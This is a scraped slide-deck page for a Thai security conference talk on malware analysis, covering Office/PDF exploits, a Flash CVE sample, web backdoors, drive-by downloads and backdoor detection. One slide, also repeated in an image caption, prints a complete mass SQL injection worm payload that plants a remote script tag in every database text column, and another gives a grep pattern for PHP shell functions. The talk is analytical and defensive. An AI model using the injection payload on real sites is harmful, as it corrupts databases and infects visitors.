Advanced Malware Analysis
1 like1,912 views
The document discusses security challenges posed by modern malware and web-based attacks. It provides examples of next-generation malware that bypass antivirus detection using techniques like embedding malicious code in Office documents or PDF files. It also discusses how web-based malware has evolved from defacements and DDoS tools to more advanced drive-by download attacks using exploit kits. The document aims to demonstrate malware analysis techniques and how to detect web server backdoors through tools and manual source code reviews. It concludes with a challenge to practice security skills safely.
![SQL Injection Worms
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E
@T varchar(255),@C varchar(255) DECLARE T
able_Cursor CURSOR FOR select a.name,b.nam
e from sysobjects a,syscolumns b where a.id
=b.id and a.xtype='u' and (b.xtype=99 or b.x
type=35 or b.xtype=231 or b.xtype=167) OPE
N Table_Cursor FETCH NEXT FROM Table_Cur
sor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=r
trim(convert(varchar,['+@C+']))+''<script sr
c=http://www.fengnima.cn/k.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END CLOSE Table_Cursor DEALLOCATE Table_C
u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);--
28 28](https://image.slidesharecdn.com/advancedmalware-120329081630-phpapp02/85/Advanced-Malware-Analysis-28-320.jpg)
![[CB20] Pwning OT: Going in Through the Eyes by Ta-Lun Yen](https://cdn.slidesharecdn.com/ss_thumbnails/ta-lunyencb20-210112134135-thumbnail.jpg?width=560&fit=bounds)
![[CB20] Operation I am Tom: How APT actors move laterally in corporate network...](https://cdn.slidesharecdn.com/ss_thumbnails/aragorntsengandcharleslicb20-210112140146-thumbnail.jpg?width=560&fit=bounds)
Ad
More Related Content
What's hot (19)
Viewers also liked (7)
Ad
Similar to Advanced Malware Analysis (20)
Ad
More from Prathan Phongthiproek (20)
![Mobile Application Pentest [Fast-Track]](https://cdn.slidesharecdn.com/ss_thumbnails/mobile1337-140527083940-phpapp02-thumbnail.jpg?width=560&fit=bounds)
Recently uploaded (20)
Advanced Malware Analysis
- 1. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity” ชำแหละโปรแกรมไม่พงประสงค์ ด้วยเทคนิคเหนือเมฆ ึ อ. ประธาน พงศ์ทิพย์ฤกษ์ SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F Section Manager, Senior Information Security Consultant ACIS Professional Center 1
- 2. Let’s Party Rock Next Generation for Malware Malware Analysis Web Based Malware Back to the Past Back to the Future Lab Challenge 2 2
- 3. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity” Next Generation of Malware 3
- 4. Old Malware fashion Executable file Packer, Crypter => FUD just 1 Week !! Spyware / Adware Rogue Security Software Virus / Worm USB Autorun 4 4
- 5. Antivirus Detected Gotcha !! 5 5
- 6. Virustotal 6 6
- 7. Virustotal – One Week later 7 7
- 8. Anubis: Analyzing Binary File 8 8
- 9. Latest Malware fashion MS Office+Flash Player PDF Reader Mobile Application Social Network Application Web Browser Toolbar Web based Malware 9 9
- 10. Bypassing Antivirus Ninja Techniques 10 10
- 11. Malware Analysis 11 11
- 12. CVE-2012-0754: SWF in DOC “Iran’s Oil and Nuclear Situation.doc” Contains flash instructing it to download and Parse a malformed MP4. OS Affect Adobe Flash Player before 10.3.183.15 and 11.x Before 11.1.102.62 on Windows, Mac OS X, Linux And Solaris Mobile Affect Adobe Flash Player before 11.1.111.6 on Android 2.x and 3.x and before 11.1.115.6 on Android 4.x 12 12
- 13. Document Analysis Decompiled Flash from file This.MyNS.play(“http://208.115.230.76/test.mp4”); Whois – 208.115.230.76 208.115.230.76 76-230-115-208.static.reverse.lstn.net Host reachable, 77 ms. average, 2 of 4 pings lost 208.115.192.0 - 208.115.255.255 Limestone Networks, Inc. 400 S. Akard Street Suite 200 Dallas TX 75202 United States 13 13
- 14. Process Monitor network log 14 14
- 15. Process Monitor network log 15 15
- 16. Traffic and C&C (us.exe) 16 16
- 17. Virus Analysis – us.exe 17 17
- 18. Target Analysis Whois – 199.192.156.134 199.192.156.134 Host reachable, 89 ms. average 199.192.152.0 - 199.192.159.255 VPS21 LTD 38958 S FREMONT BLVD FREMONT CA 94536 United States zou, jinhe +1-408-205-7550 18 18
- 19. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity” Web Based Malware 19
- 20. Back to the Past 20 20
- 21. Web Defacement 21 21
- 22. Zone-H 22 22
- 23. Ddos Tool 23 23
- 24. Hack 4 Fun and Profit 24 24
- 25. Back to the Future 25 25
- 26. About My Memory 2008 Oishi website was hacked without defacement Kaspersky AV alert for “A little javascript file” 2009 SQL injection worms on MSSQL Affect many Bank on Thailand 2010 Google and Firefox alert for malware website Obfuscation JS to bypass AV 2011 Many website was blocked by Google Malware 26 26
- 28. SQL Injection Worms ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E @T varchar(255),@C varchar(255) DECLARE T able_Cursor CURSOR FOR select a.name,b.nam e from sysobjects a,syscolumns b where a.id =b.id and a.xtype='u' and (b.xtype=99 or b.x type=35 or b.xtype=231 or b.xtype=167) OPE N Table_Cursor FETCH NEXT FROM Table_Cur sor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=r trim(convert(varchar,['+@C+']))+''<script sr c=http://www.fengnima.cn/k.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_C u r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);-- 28 28
- 29. Web Application Backdoor 29 29
- 30. Web Application Backdoor - FUD 30 30
- 31. Redbull.php (PHP Backdoor) 31 31
- 32. Insert Malicious JS into config.inc.php 32 32
- 33. Crimepack Exploit Kit 33 33
- 34. Crimeware Exploit Kit 34 34
- 35. Drive-By Download Visit Malicious Website Malicious JS execute Web Server Redirect to Malware Server Exploit Browser / Flash Player Reverse Shell to Attacker Malware Server 35 34
- 36. Google Malware Alert 36 35
- 37. Google Diagnostic 37 36
- 38. http://www.stopbadware.org/hom e/reviewinfo 38 37
- 40. http://sucuri.net/malware/malwar e-entry-mwhta7 40 39
- 41. http://sucuri.net/malware/malwar e-entry-mwhta7 41 40
- 43. Detect Webserver Backdoor Manual Source review NeoPI – Neohapsis PHP Shell Scanner http://25yearsofprogramming.com/php/findmaliciouscode.htm grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdi r|fopen|fclose|readfile) *(” /var/www/ 43 42
- 44. PHP Shell Scanner 44 43
- 45. Undetectable #1 45 44
- 46. Undetectable #2 46 45
- 47. JS De-Obfuscate Tool Google Chrome Developer Tools Firebug (Firefox’s plugin) JSDebug (Firefox’s plugin) Javascript Deobfuscator (Firefox’s plugin) Malzilla Rhino SpiderMonkey 47 46
- 48. Simple JS Obfuscate 48 47
- 49. Simple JS Obfuscate 49 48
- 50. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity” Lab Challenge 50
- 51. Be Safe www.cdicconference.com 51 50